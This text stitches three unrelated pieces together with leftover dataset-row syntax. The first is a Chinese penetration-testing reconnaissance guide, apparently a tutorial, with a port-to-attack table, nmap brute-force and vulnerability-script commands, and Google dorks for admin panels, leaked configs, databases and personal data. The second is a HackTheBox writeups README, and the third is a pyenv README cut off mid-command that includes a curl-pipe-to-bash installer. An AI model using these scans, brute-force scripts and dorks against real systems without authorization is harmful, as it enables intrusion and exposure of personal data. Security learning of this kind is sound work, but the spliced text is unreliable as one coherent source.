\t\t\t 总结:ms17-010/端口溢出\n端口:512/513/514 服务:Linux Rexec服务 总结:爆破/Rlogin登陆\n端口:873 服务:Rsync服务 \t\t\t\t总结:文件上传/未授权访问\n端口:1080 服务:socket \t\t\t\t 总结:爆破\n端口:1352 服务:Lotus domino邮件服务 总结:爆破/信息泄漏\n端口:1433 服务:mssql \t\t\t\t 总结:爆破/注入/SA弱口令\n端口:1521 服务:oracle 总结:爆破/注入/TNS爆破/反弹shell2049Nfs服务配置不当\n端口:2181 服务:zookeeper服务 \t\t 总结:未授权访问\n端口:2375 服务:docker remote api 总结:未授权访问\n端口:3306 服务:mysql \t\t\t\t总结:爆破/注入\n端口:3389 服务:Rdp远程桌面链接 总结:爆破/shift后门\n端口:4848 服务:GlassFish控制台 总结:爆破/认证绕过\n端口:5000 服务:sybase/DB2数据库\t 总结:爆破/注入/提权\n端口:5432 服务:postgresql \t\t 总结:爆破/注入/缓冲区溢出\n端口:5632 服务:pcanywhere服务 \t 总结:抓密码/代码执行\n端口:5900 服务:vnc \t\t\t\t\t总结:爆破/认证绕过\n端口:6379 服务:Redis数据库 \t 总结:未授权访问/爆破\n端口:7001/7002 服务:weblogic \t\t总结:java反序列化/控制台弱口令\n端口:80/443 服务:http/https \t\t总结:web应用漏洞/心脏滴血\n端口:8069 服务:zabbix服务 \t\t 总结:远程命令执行/注入\n端口:8161 服务:activemq \t\t\t总结:弱口令/写文件\n端口:8080/8089 服务:Jboss/Tomcat/Resin 总结:爆破/PUT文件上传/反序列化\n端口:8083/8086 服务:influxDB \t\t总结:未授权访问\n端口:9000 服务:fastcgi \t\t\t\t总结:远程命令执行\n端口:9090 服务:Websphere \t\t\t总结:控制台爆破/java反序列化/弱口令\n端口:9200/9300 服务:elasticsearch 总结:远程代码执行\n端口:11211 服务:memcached \t\t\t总结:未授权访问\n端口:27017/27018 服务:mongodb \t\t总结:未授权访问/爆破\n```\n\n详细参考:[掘安攻防实验室](https://mp.weixin.qq.com/s/Y0PPqyHysBPmgmDw2KmHYw)\n\n## 扫描工具\n\n### 常用扫描工具\n\n```\nNmap \n\nMasscan \n\nZMap \n\n御剑高速TCP端口扫描工具\n\n御剑高速端口扫描工具\n\nIISPutScanner\n\nIISPutScanner增强版-DotNetScan v1.1 Beta\n\nmasnmapscan\n```\n\n### 常用扫描工具使用\n\n#### nmap\n\n项目地址:`https://github.com/nmap/nmap`\n\n* 扫描多个IP\n\n```\n扫描整个子网 nmap 192.168.6.1/24\n\t\t nmap 192.168.1.1/16\n\t\t nmap 192.168.1-30.1-254\n\t\t nmap 192.168.1-254.6\n扫描多个主机 namp 192.168.6.2 192.168.6.6\n扫描一个小范围 nmap 192.168.6.2-10\n扫描txt内的ip列表 nmap -iL text.txt\n扫描除某个目标外 nmap 192.168.6.1/24 -exclude 192.168.6.25\n```\n\n* 绕过Firewalld扫描主机端口\n\n通过不同的协议(TCP半连接、TCP全连接、ICMP、UDP等)的扫描绕过Firewalld的限制\n\n```\nnmap -sP 192.33.6.128\nnmap -sT 192.33.6.128\nnmap -sS 192.33.6.128\nnmap -sU 192.33.6.128\nnmap -sF 192.33.6.128\nnmap -sX 192.33.6.128\nnmap -sN 192.33.6.128\n```\n\n* 初步扫描端口信息\n\n```\nnmap -T4 -A -v -Pn 192.168.1.1/24 -p 21,22,23,25,80,81,82,83,88,110,143,443,445,512,513,514,1433,1521,2082,2083,2181,2601,2604,3128,3306,3389,3690,4848,5432,5900,5984,6379,7001,7002,8069,8080,8081,8086,8088,9200,9300,11211,10000,27017,27018,50000,50030,50070 -oN nmap_result.txt\n```\n\n![](img/1594459-20200119150735085-1154381786.png)\n\n* 扫描端口并且标记可以爆破的服务\n\n```\nnmap 127.0.0.1 --script=ftp-brute,imap-brute,smtp-brute,pop3-brute,mongodb-brute,redis-brute,ms-sql-brute,rlogin-brute,rsync-brute,mysql-brute,pgsql-brute,oracle-sid-brute,oracle-brute,rtsp-url-brute,snmp-brute,svn-brute,telnet-brute,vnc-brute,xmpp-brute\n```\n\n![](img/1594459-20200119142721442-1575053305.png)\n\n* 判断常见的漏洞并扫描端口\n\n```\nnmap 127.0.0.1 --script=auth,vuln\n```\n\n![](img/1594459-20200119142731949-1278292617.png)\n\n* 精确判断漏洞并扫描端口\n\n```\nnmap 127.0.0.1 --script=dns-zone-transfer,ftp-anon,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,http-backup-finder,http-cisco-anyconnect,http-iis-short-name-brute,http-put,http-php-version,http-shellshock,http-robots.txt,http-svn-enum,http-webdav-scan,iis-buffer-overflow,iax2-version,memcached-info,mongodb-info,msrpc-enum,ms-sql-info,mysql-info,nrpe-enum,pptp-version,redis-info,rpcinfo,samba-vuln-cve-2012-1182,smb-vuln-ms08-067,smb-vuln-ms17-010,snmp-info,sshv1,xmpp-info,tftp-enum,teamspeak2-version\n```\n\n#### Masscan\n\n项目地址:`https://github.com/robertdavidgraham/masscan`\n\nMasscan主要是真对全网进行端口扫描\n\n#### Zmap\n\n项目地址:`https://github.com/zmap/zmap`\n\nZmap主要是真对全网进行端口扫描\n\n#### 御剑高速TCP端口扫描工具\n\n![](img/1594459-20200119142744950-434617774.png)\n\n#### 御剑高速端口扫描工具\n\n![](img/1594459-20200119142757545-1040489796.png)\n\n#### masnmapscan\n\n项目地址:`https://github.com/hellogoldsnakeman/masnmapscan-V1.0`\n\nmasnmapscan整合了masscan和nmap两款扫描器,masscan扫描端口,nmap扫描端口对应服务,二者结合起来实现了又快又好地扫描。并且加入了针对目标资产有防火墙的应对措施。\n\n### 网络空间引擎搜索\n\nshodan、FOFA、zoomeye\n\nFOFA为例\n\nhttps://fofa.so/\n\n![](img/1594459-20200119142808985-1292014262.png)\n\n### 浏览器插件\n\n通过Google、FireFox等插件的使用,收集主机端口开放信息\n\n#### Shodan\n\n![](img/1594459-20200119142819024-1802418948.png)\n\n#### TCPIPUTILS\n\n![](img/1594459-20200119142829090-1787287221.png)\n\n#### DNSlytics.\n\n![](img/1594459-20200119142839382-1486144346.png)\n\n# 指纹识别\n\n在漏洞挖掘中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。\n\nCMS (Content Management System)又称整站系统或文章系统。常见的CMS有Dedecms (织梦)、Discuz、 PHPWEB、 PHPWind、PHPCMS、ECShop、 Dvbbs、 SiteWeaver、 ASPCMS、帝国、Z- Blog、WordPress等。\n\n## 第三方平台\n\n云悉 http://www.yunsee.cn/\n\nTideFinger http://finger.tidesec.net/\n\nBugScaner http://whatweb.bugscaner.com/look/\n\n数字观星 https://fp.shuziguanxing.com/#/\n\n![](img/1594459-20200119142854987-277705405.png)\n\n## 工具\n\n常用指纹识别工具有:`御剑Web指纹识别`、`WhatWeb`、`Test404轻量CMS指纹识别+v2.1`、`椰树`等,可以快速识别一些主流CMS\n\n![](img/1594459-20200119142905515-1626640337.png)\n\nGithub项目\n\n```\n[CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)\n\n[CMSmap](https://github.com/Dionach/CMSmap)\n\n[ACMSDiscovery](https://github.com/aedoo/ACMSDiscovery)\n\n[TideFinger](https://github.com/TideSec/TideFinger)\n\n[AngelSword](https://github.com/Lucifer1993/AngelSword)\n```\n\n![](img/1594459-20200119152155149-1636869790.png)\n\n## 浏览器插件\n\n通过Google、FireFox等插件的使用,收集网站结构信息\n\n### Wappalyzer\n\n![](img/1594459-20200119142916899-799352136.png)\n\n# 收集敏感信息\n\n## WAF识别\n\n识别网站使用的什么WAF,可以去找相应的绕过手段\n\n### wafw00f\n\n项目地址:https://github.com/EnableSecurity/wafw00f\n\n![](img/1594459-20200119142930233-1332790706.png)\n\n## 源码泄露\n\n### 常见源码泄露\n\n```\n/.bzr/\n/CVS/Entries\n/CVS/Root\n/.DS_Store MacOS自动生成\n/.hg/\n/.svn/ (/.svn/entries)\n/.git/\n/WEB-INF/src/\n/WEB-INF/lib/\n/WEB-INF/classes/\n/WEB-INF/database.properties\n/WEB-INF/web.xml\n\nRobots.txt\n```\n\n上述源码泄露在Github上都可以找到相应的利用工具\n\n### 源码泄露扫描工具\n\n将常见源码泄露加入字典配合FUZZ、御剑等扫描器进行扫描收集\n\n### 源码泄露利用工具\n\n.git源码泄露:https://github.com/lijiejie/GitHack\n\n.DS_Store泄露:https://github.com/lijiejie/ds_store_exp\n\n.bzr、CVS、.svn、.hg源码泄露:https://github.com/kost/dvcs-ripper\n\n## 备份文件泄露\n\n### 网站备份文件泄露常见名称\n\n```\nbackup\ndb\ndata\nweb\nwwwroot\ndatabase\nwww\ncode\ntest\nadmin\nuser\nsql\n```\n\n### 网站备份文件泄露常见后缀\n\n```\n.bak\n.html\n_index.html\n.swp\n.rar\n.txt\n.zip\n.7z\n.sql\n.tar.gz\n.tgz\n.tar\n```\n\n### 网站备份文件泄露扫描工具\n\n常见扫描工具有:Test404网站备份文件扫描器 v2.0、ihoneyBakFileScan等\n\nihoneyBakFileScan v0.2 多进程批量网站备份文件泄露扫描工具,根据域名自动生成相关扫描字典,自动记录扫描成功的备份地址到文件\n\n![](img/1594459-20200119142945747-1732902549.png)\n\n## Google Hacking\n\n### 常用GoogleHacking语法\n\n1、intext:(仅针对Google有效)\n把网页中的正文内容中的某个字符作为搜索的条件\n\n2、intitle:\n把网页标题中的某个字符作为搜索的条件\n\n3、cache:\n搜索搜索引擎里关于某些内容的缓存,可能会在过期内容中发现有价值的信息\n\n4、filetype/ext:\n指定一个格式类型的文件作为搜索对象\n\n5、inurl:\n搜索包含指定字符的URL\n\n6、site:\n在指定的(域名)站点搜索相关内容\n\n### 其他GoogleHacking语法\n\n1、引号 '' \"\n把关键字打上引号后,把引号部分作为整体来搜索\n\n2、or\n同时搜索两个或更多的关键字\n\n3、link\n搜索某个网站的链接 link:baidu.com即返回所有和baidu做了链接的URL\n\n4、info\n查找指定站点的一些基本信息\n\n### GoogleHacking典型用法\n\n- 管理后台地址\n\n```\nsite:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system\nsite:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backend\nsite:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录\n```\n\n- 上传类漏洞地址\n\n```\nsite:target.com inurl:file\nsite:target.com inurl:upload\n```\n\n- 注入页面\n\n```\nsite:target.com inurl:php?id=\n```\n\n- 编辑器页面\n\n```\nsite:target.com inurl:ewebeditor\n```\n\n- 目录遍历漏洞\n\n```\nsite:target.com intitle:index.of\n```\n\n- SQL错误\n\n```\nsite:target.com intext:\"sql syntax near\" | intext:\"syntax error has occurred\" | intext:\"incorrect syntax near\" | intext:\"unexpected end of SQL command\" | intext:\"Warning: mysql_connect()\" | intext:”Warning: mysql_query()\" | intext:”Warning: pg_connect()\"\n```\n\n- phpinfo()\n\n```\nsite:target.com ext:php intitle:phpinfo \"published by the PHP Group\"\n```\n\n- 配置文件泄露\n\n```\nsite:target.com ext:.xml | .conf | .cnf | .reg | .inf | .rdp | .cfg | .txt | .ora | .ini\n```\n\n- 数据库文件泄露\n\n```\nsite:target.com ext:.sql | .dbf | .mdb | .db\n```\n\n- 日志文件泄露\n\n```\nsite:target.com ext:.log\n```\n\n- 备份和历史文件泄露\n\n```\nsite:target.com ext:.bkf | .bkp | .old | .backup | .bak | .swp | .rar | .txt | .zip | .7z | .sql | .tar.gz | .tgz | .tar\n```\n\n- 公开文件泄露\n\n```\nsite:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv\n```\n\n- 邮箱信息 \n\n```\nsite:target.com intext:@target.com\nsite:target.com 邮件\nsite:target.com email\n```\n\n- 社工信息\n\n```\nsite:target.com intitle:账号 | 密码 | 工号 | 学号 | 身份证\n```\n\n![](img/1594459-20200119152425254-1738721113.png)\n\n## JS获取敏感接口\n\n### JSFinder\n\nJSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。\n\n- 安装\n\n```\npip3 install requests bs4\ngit clone https://github.com/Threezh1/JSFinder.git\n```\n\n- 使用\n\n```\npython3 JSFinder.py -u http://www.mi.com\npython3 JSFinder.py -u http://www.mi.com -d\n```\n\n![](img/1594459-20200119152940819-547890202.png)\n\n### LinkFinder\n\n该工具通过网站中的JS文件来发现服务端、敏感信息、隐藏控制面板的URL链接等有用信息,可最大化地提高URL发现效率\n\n- 安装\n\n```\ngit clone https://github.com/GerbenJavado/LinkFinder.git\ncd LinkFinder\npython2 setup.py install\n```\n\n- 使用\n\n在线JavaScript文件中查找端点的最基本用法,并将结果输出到results.html:\n\n```\npython linkfinder.py -i https://example.com/1.js -o results.html\n```\n\nCLI输出(不使用jsbeautifier,这使得它非常快):\n\n```\npyhon linkfinder.py -i https://example.com/1.js -o cli\n```\n\n分析整个域及其JS文件:\n\n```\npython linkfinder.py -i https://example.com -d\n```\n\nBurp输入(在目标中选择要保存的文件,右键单击,Save selected items将该文件作为输入):\n\n```\npython linkfinder.py -i burpfile -b\n```\n\n枚举JavaScript文件的整个文件夹,同时查找以/ api /开头的终结点,并最终将结果保存到results.html:\n\n```\npython linkfinder.py -i 'Desktop/*.js' -r ^/api/ -o results.html\n```\n\n![](img/1594459-20200119153545222-989750205.png)\n\n## 目录&后台扫描\n\n常用工具-自己\n\n```\n7kbscan-WebPathBrute https://github.com/7kbstorm/7kbscan-WebPathBrute\nDirMap https://github.com/H4ckForJob/dirmap\ndirsearch https://github.com/maurosoria/dirsearch\nFuzz-gobuster https://github.com/OJ/gobuster\nFuzz-dirbuster OWASP kali自带\nFuzz-wfuzz https://github.com/xmendez/wfuzz\nTest404轻量后台扫描器+v2.0\n御剑\n```\n\n个人比较喜欢使用Fuzz大法,不管是目录扫描、后台扫描、Web漏洞模糊测试都是非常灵活的。这几款fuzz工具都比较好用\n\n```\n基于Go开发:gobuster\n基于Java开发:dirbuster\n基于Python开发:wfuzz\n```\n\n- dirbuster\n\n![](img/1594459-20200119155315684-2055799224.png)\n\n- wfuzz\n\n![](img/1594459-20200119155738473-643631035.png)\n\n工具无论再多再好,没有一个好的字典一切都是空谈。强大字典是需要自己平时慢慢的积累。\n\n## 越权查询\n\n遍历uid获得身份信息等\n\n## 代码托管\n\n通过代码托管平台搜索敏感信息(内部邮箱账号密码、数据库账号密码等)\n\n- github\n\nGitHub是一个面向开源及私有软件项目的托管平台。\n\n平台地址:https://github.com/\n\nGitHub敏感信息泄露一直是企业信息泄露和知识产权泄露的重灾区,安全意识薄弱的同事经常会将公司的代码、各种服务的账户等极度敏感的信息『开源』到github中,github也是黑、白帽子、安全工程师的必争之地。\n\nGithub泄露扫描系统开发:https://sec.xiaomi.com/article/37\n\n在GitHub中一般通过搜索网站域名、网站JS路径、网站备案、网站下的技术支持等进行敏感信息查询\n\n![](img/1594459-20200119162240355-550566948.png)\n\n- gitee\n\n平台地址:https://gitee.com/\n\n码云:开源中国出品的代码托管、协作开发平台。\n\n- gitcafe\n\nGitCafe一个基于代码托管服务打造的技术协作与分享平台\n\n## Whois&备案查询\n\n通过Whois和备案查询得到网站的注册人、手机号、邮箱等(对后续的密码生成和社工很有帮助)\n\n## 公网网盘\n\n公司员工可能把一些内部资料放在了公网网盘,然后被在线云网盘搜索的网站抓取了,我们就可以利用这个来对目标系统进行深入挖掘。\n\n可以利用云网盘搜索工具搜集敏感文件,一般直接输入厂商名字进行搜索\n\n### 凌风云搜索\n\n地址:https://www.lingfengyun.com/\n\n![](img/1594459-20200119143019466-1878206759.png)\n\n## 网站截图 \n\n对目标网站页面进行截图,通过截图找到敏感页面\n\n### webscreenshot\n\n基于[`url-to-image`](https://github.com/kimmobrunfeldt/url-to-image/)的网站截图工具\n\n- 安装\n\n```\ngit clone https://github.com/maaaaz/webscreenshot.git\n\napt-get update && apt-get -y install phantomjs\n\nphantomjs -v\n\nUbuntu 16 中安装 phantomjs 出现 QXcbConnection 问题\n\texport QT_QPA_PLATFORM=offscreen\n\texport QT_QPA_FONTDIR=/usr/share/fonts\n```\n\n- 使用\n\n```\ncd webscreenshot/\n\npython2.7 webscreenshot.py -i url.txt\n```\n\n![](img/1594459-20200119161002755-701856606.png)\n\n## 获取公开文件\n\n### snitch\n\nSnitch可以针对指定域自动执行信息收集过程。此工具可帮助收集可通过Web搜索引擎找到的指定信息。在渗透测试的早期阶段,它可能非常有用。\n\n- 安装\n\n```\ngit clone https://github.com/Smaash/snitch.git\n```\n\n- 使用\n\n```\npython2.7 snitch.py -C \"site:whitehouse.gov filetype:pdf\" -P 100\n```\n\n![](img/1594459-20200119161531465-1731396088.png)\n\n### Google Hacking\n\n```\nsite:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv\n```\n\n![](img/1594459-20200119161241851-445496927.png)\n\n## 邮箱信息收集\n\n### Infoga\n\nInfoga可从不同的公共源网络(搜索引擎,pgp密钥服务器和shodan)收集电子邮件帐户信息(ip,主机名,国家/地区...)。是一个用法非常简单的工具,但是,对于渗透测试的早期阶段,或者只是为了了解自己公司在互联网上的可见性是非常有效的。\n\n- 安装\n\n```\ngit clone https://github.com/m4ll0k/Infoga.git /data/infoga\ncd /data/infoga\npip3 install requests\npython3 infoga.py\n```\n\n- 使用\n\n```\npython3 infoga.py --domain site.com --source all -v 3 | grep Email | cut -d ' ' -f 3 | uniq | sed -n '/-/!p'\npython3 infoga.py --info emailtest@site.com\npython3 infoga.py --info emailtest@site.com -b\n```\n\n### Google Hacking\n\n```\nsite:target.com intext:@target.com\nsite:target.com 邮件\nsite:target.com email\n```\n\n![](img/1594459-20200119161412993-1570311002.png)\n\n# 历史漏洞&资产\n\n很多时候去查看目标的历史漏洞和资产信息,往往能够得到很多有价值的信息。\n\n- 乌云漏洞库\n\n平台地址:`https://github.com/hanc00l/wooyun_public`\n\n- Exploit-db\n\n平台地址:`https://www.exploit-db.com/`\n\n- Securityfocus\n\n平台地址:`https://www.securityfocus.com/bid`\n\n- Cxsecurity\n\n平台地址:`https://cxsecurity.com/exploit/`\n\n- 国家信息安全漏洞库\n\n平台地址:`http://www.cnnvd.org.cn/`\n\n- Seebug\n\n平台地址:`https://www.seebug.org/`\n\n等。。。\n\n"}}},{"rowIdx":532,"cells":{"text":{"kind":"string","value":"# HackTheBox Writeups\n\nI have been trying to give back to the community by drafting writeup reports for the machines I've completed on Hack the Box, a website for practising ethical hacking.\n\n## Beginner-Friendly All The Way\nI pitch every report for a 'beginner', regardless of the difficulty of the machine. I've made this choice as I consider writeups to be a great learning resource for people trying to get started in the area. I am always available for for a chat when it comes to cyber, and especially ethical hacking for beginners. \n\n## Preparing for the OSCP ?\nIf you're using Hack the Box to prepare for your OSCP exam, you'll be pleased to know most of my writeups adhere to the rules of the OSCP exam (i.e no use of metasploit, sqlmap etc). \n\nI'd also recommend you read my 'OSCP Lab & Exam Review and Tips'. It was originally on Reddit, but I have created a copy you can find in this repo.\n\n## Retired Machines\nRetired machines are free to peruse in their own folder above, with no password. Download the PDF, as it renders slowly and weirdly on the Github viewer. \n\n## Active Machines\nActive machines are downloadable PDFs, locked with passwords. Click on the PDF you want and download it to your computer. \nWith each active box, I state the required password (below) you will need to unlock it when prompted after you open it on your computer, so please keep an eye out for this. \n"}}},{"rowIdx":533,"cells":{"text":{"kind":"string","value":"# Simple Python Version Management: pyenv\n\n[![Join the chat at https://gitter.im/yyuu/pyenv](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/yyuu/pyenv?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\npyenv lets you easily switch between multiple versions of Python. It's\nsimple, unobtrusive, and follows the UNIX tradition of single-purpose\ntools that do one thing well.\n\nThis project was forked from [rbenv](https://github.com/rbenv/rbenv) and\n[ruby-build](https://github.com/rbenv/ruby-build), and modified for Python.\n\n![Terminal output example](/terminal_output.png)\n\n\n### What pyenv _does..._\n\n* Lets you **change the global Python version** on a per-user basis.\n* Provides support for **per-project Python versions**.\n* Allows you to **override the Python version** with an environment\n variable.\n* Searches for commands from **multiple versions of Python at a time**.\n This may be helpful to test across Python versions with [tox](https://pypi.python.org/pypi/tox).\n\n\n### In contrast with pythonbrew and pythonz, pyenv _does not..._\n\n* **Depend on Python itself.** pyenv was made from pure shell scripts.\n There is no bootstrap problem of Python.\n* **Need to be loaded into your shell.** Instead, pyenv's shim\n approach works by adding a directory to your `PATH`.\n* **Manage virtualenv.** Of course, you can create [virtualenv](https://pypi.python.org/pypi/virtualenv)\n yourself, or [pyenv-virtualenv](https://github.com/pyenv/pyenv-virtualenv)\n to automate the process.\n\n----\n\n\n## Table of Contents\n\n* **[How It Works](#how-it-works)**\n * [Understanding PATH](#understanding-path)\n * [Understanding Shims](#understanding-shims)\n * [Understanding Python version selection](#understanding-python-version-selection)\n * [Locating Pyenv-provided Python Installations](#locating-pyenv-provided-python-installations)\n* **[Installation](#installation)**\n * [Getting Pyenv](#getting-pyenv)\n * [UNIX/MacOS](#unixmacos)\n * [Homebrew in macOS](#homebrew-in-macos)\n * [Automatic installer](#automatic-installer)\n * [Basic GitHub Checkout](#basic-github-checkout)\n * [Windows](#windows)\n * [Set up your shell environment for Pyenv](#set-up-your-shell-environment-for-pyenv)\n * [Restart your shell](#restart-your-shell)\n * [Install Python build dependencies](#install-python-build-dependencies)\n* **[Usage](#usage)**\n * [Install additional Python versions](#install-additional-python-versions)\n * [Prefix auto-resolution to the latest version](#prefix-auto-resolution-to-the-latest-version)\n * [Python versions with extended support](#python-versions-with-extended-support)\n * [Switch between Python versions](#switch-between-python-versions)\n * [Uninstall Python versions](#uninstall-python-versions)\n * [Other operations](#other-operations)\n* [Upgrading](#upgrading)\n * [Upgrading with Homebrew](#upgrading-with-homebrew)\n * [Upgrading with Installer or Git checkout](#upgrading-with-installer-or-git-checkout)\n* [Uninstalling pyenv](#uninstalling-pyenv)\n* [Pyenv plugins](#pyenv-plugins)\n* [Advanced Configuration](#advanced-configuration)\n * [Using Pyenv without shims](#using-pyenv-without-shims)\n * [Environment variables](#environment-variables)\n* **[Development](#development)**\n * [Contributing](#contributing)\n * [Version History](#version-history)\n * [License](#license)\n\n\n----\n\n\n## How It Works\n\nAt a high level, pyenv intercepts Python commands using shim\nexecutables injected into your `PATH`, determines which Python version\nhas been specified by your application, and passes your commands along\nto the correct Python installation.\n\n\n### Understanding PATH\n\nWhen you run a command like `python` or `pip`, your operating system\nsearches through a list of directories to find an executable file with\nthat name. This list of directories lives in an environment variable\ncalled `PATH`, with each directory in the list separated by a colon:\n\n /usr/local/bin:/usr/bin:/bin\n\nDirectories in `PATH` are searched from left to right, so a matching\nexecutable in a directory at the beginning of the list takes\nprecedence over another one at the end. In this example, the\n`/usr/local/bin` directory will be searched first, then `/usr/bin`,\nthen `/bin`.\n\n\n### Understanding Shims\n\npyenv works by inserting a directory of _shims_ at the front of your\n`PATH`:\n\n $(pyenv root)/shims:/usr/local/bin:/usr/bin:/bin\n\nThrough a process called _rehashing_, pyenv maintains shims in that\ndirectory to match every Python command across every installed version\nof Python—`python`, `pip`, and so on.\n\nShims are lightweight executables that simply pass your command along\nto pyenv. So with pyenv installed, when you run, say, `pip`, your\noperating system will do the following:\n\n* Search your `PATH` for an executable file named `pip`\n* Find the pyenv shim named `pip` at the beginning of your `PATH`\n* Run the shim named `pip`, which in turn passes the command along to\n pyenv\n\n\n### Understanding Python version selection\n\nWhen you execute a shim, pyenv determines which Python version to use by\nreading it from the following sources, in this order:\n\n1. The `PYENV_VERSION` environment variable (if specified). You can use\n the [`pyenv shell`](https://github.com/pyenv/pyenv/blob/master/COMMANDS.md#pyenv-shell) command to set this environment\n variable in your current shell session.\n\n2. The application-specific `.python-version` file in the current\n directory (if present). You can modify the current directory's\n `.python-version` file with the [`pyenv local`](https://github.com/pyenv/pyenv/blob/master/COMMANDS.md#pyenv-local)\n command.\n\n3. The first `.python-version` file found (if any) by searching each parent\n directory, until reaching the root of your filesystem.\n\n4. The global `$(pyenv root)/version` file. You can modify this file using\n the [`pyenv global`](https://github.com/pyenv/pyenv/blob/master/COMMANDS.md#pyenv-global) command.\n If the global version file is not present, pyenv assumes you want to use the \"system\"\n Python (see below).\n\nA special version name \"`system`\" means to use whatever Python is found on `PATH`\nafter the shims `PATH` entry (in other words, whatever would be run if Pyenv\nshims weren't on `PATH`). Note that Pyenv considers those installations outside\nits control and does not attempt to inspect or distinguish them in any way.\nSo e.g. if you are on MacOS and have OS-bundled Python 3.8.9 and Homebrew-installed\nPython 3.9.12 and 3.10.2 -- for Pyenv, this is still a single \"`system`\" version,\nand whichever of those is first on `PATH` under the executable name you\nspecified will be run.\n\n**NOTE:** You can activate multiple versions at the same time, including multiple\nversions of Python2 or Python3 simultaneously. This allows for parallel usage of\nPython2 and Python3, and is required with tools like `tox`. For example, to instruct\nPyenv to first use your system Python and Python3 (which are e.g. 2.7.9 and 3.4.2)\nbut also have Python 3.3.6, 3.2.1, and 2.5.2 available, you first `pyenv install`\nthe missing versions, then set `pyenv global system 3.3.6 3.2.1 2.5.2`.\nThen you'll be able to invoke any of those versions with an appropriate `pythonX` or\n`pythonX.Y` name.\nYou can also specify multiple versions in a `.python-version` file by hand,\nseparated by newlines. Lines starting with a `#` are ignored.\n\n[`pyenv which `](COMMANDS.md#pyenv-which) displays which real executable would be\nrun when you invoke `` via a shim.\nE.g. if you have 3.3.6, 3.2.1 and 2.5.2 installed of which 3.3.6 and 2.5.2 are selected\nand your system Python is 3.2.5,\n`pyenv which python2.5` should display `$(pyenv root)/versions/2.5.2/bin/python2.5`,\n`pyenv which python3` -- `$(pyenv root)/versions/3.3.6/bin/python3` and\n`pyenv which python3.2` -- path to your system Python due to the fall-through (see below).\n\nShims also fall through to anything further on `PATH` if the corresponding executable is\nnot present in any of the selected Python installations.\nThis allows you to use any programs installed elsewhere on the system as long as\nthey are not shadowed by a selected Python installation.\n\n\n### Locating Pyenv-provided Python installations\n\nOnce pyenv has determined which version of Python your application has\nspecified, it passes the command along to the corresponding Python\ninstallation.\n\nEach Python version is installed into its own directory under\n`$(pyenv root)/versions`.\n\nFor example, you might have these versions installed:\n\n* `$(pyenv root)/versions/2.7.8/`\n* `$(pyenv root)/versions/3.4.2/`\n* `$(pyenv root)/versions/pypy-2.4.0/`\n\nAs far as Pyenv is concerned, version names are simply directories under\n`$(pyenv root)/versions`.\n\n----\n\n\n## Installation\n\n### Getting Pyenv\n#### UNIX/MacOS\n##### Homebrew in macOS\n\n 1. Consider installing with [Homebrew](https://brew.sh):\n ```sh\n brew update\n brew install pyenv\n ```\n 2. Then follow the rest of the post-installation steps, starting with\n [Set up your shell environment for Pyenv](#set-up-your-shell-environment-for-pyenv).\n\n 3. OPTIONAL. To fix `brew doctor`'s warning _\"\"config\" scripts exist outside your system or Homebrew directories\"_\n\n If you're going to build Homebrew formulae from source that link against Python\n like Tkinter or NumPy\n _(This is only generally the case if you are a developer of such a formula,\n or if you have an EOL version of MacOS for which prebuilt bottles are no longer provided\n and you are using such a formula)._\n\n To avoid them accidentally linking against a Pyenv-provided Python,\n add the following line into your interactive shell's configuration:\n\n * Bash/Zsh:\n\n ~~~bash\n alias brew='env PATH=\"${PATH//$(pyenv root)\\/shims:/}\" brew'\n ~~~\n\n * Fish:\n\n ~~~fish\n alias brew=\"env PATH=(string replace (pyenv root)/shims '' \\\"\\$PATH\\\") brew\"\n ~~~\n\n\n##### Automatic installer\n\n`curl https://pyenv.run | bash`\n\nFor more details visit our other project:\nhttps://github.com/pyenv/pyenv-installer\n\n\n##### Basic GitHub Checkout\n\nThis will get you going with the latest version of Pyenv and make it\neasy to fork and contribute any changes back upstream.\n\n* **Check out Pyenv where you want it installed.**\n A good place to choose is `$HOME/.pyenv` (but you can install it somewhere else):\n ```\n git clone https://github.com/pyenv/pyenv.git ~/.pyenv\n ```\n* Optionally, try to compile a dynamic Bash extension to speed up Pyenv. Don't\n worry if it fails; Pyenv will still work normally:\n ```\n cd ~/.pyenv && src/configure && make -C src\n ```\n\n#### Windows\n\nPyenv does not officially support Windows and does not work in Windows outside\nthe Windows Subsystem for Linux.\nMoreover, even there, the Pythons it installs are not native Windows versions\nbut rather Linux versions running in a virtual machine --\nso you won't get Windows-specific functionality.\n\nIf you're in Windows, we recommend using @kirankotari's [`pyenv-win`](https://github.com/pyenv-win/pyenv-win) fork --\nwhich does install native Windows Python versions.\n\n\n### Set up your shell environment for Pyenv\n\n**Upgrade note:** The startup logic and instructions have been updated for simplicity in 2.3.0.\nThe previous, more complicated configuration scheme for 2.0.0-2.2.5 still works.\n\n* Define environment variable `PYENV_ROOT` to point to the path where\n Pyenv will store its data. `$HOME/.pyenv` is the default.\n If you installed Pyenv via Git checkout, we recommend\n to set it to the same location as where you cloned it.\n* Add the `pyenv` executable to your `PATH` if it's not already there\n* run `eval \"$(pyenv init -)\"` to install `pyenv` into your shell as a shell function, enable shims and autocompletion\n * You may run `eval \"$(pyenv init --path)\"` instead to just enable shims, without shell integration\n\nThe below setup should work for the vast majority of users for common use cases.\nSee [Advanced configuration](#advanced-configuration) for details and more configuration options.\n\n - For **bash**:\n\n Stock Bash startup files vary widely between distributions in which of them source\n which, under what circumstances, in what order and what additional configuration they perform.\n As such, the most reliable way to get Pyenv in all environments is to append Pyenv\n configuration commands to both `.bashrc` (for interactive shells)\n and the profile file that Bash would use (for login shells).\n\n First, add the commands to `~/.bashrc` by running the following in your terminal:\n\n ~~~ bash\n echo 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.bashrc\n echo 'command -v pyenv >/dev/null || export 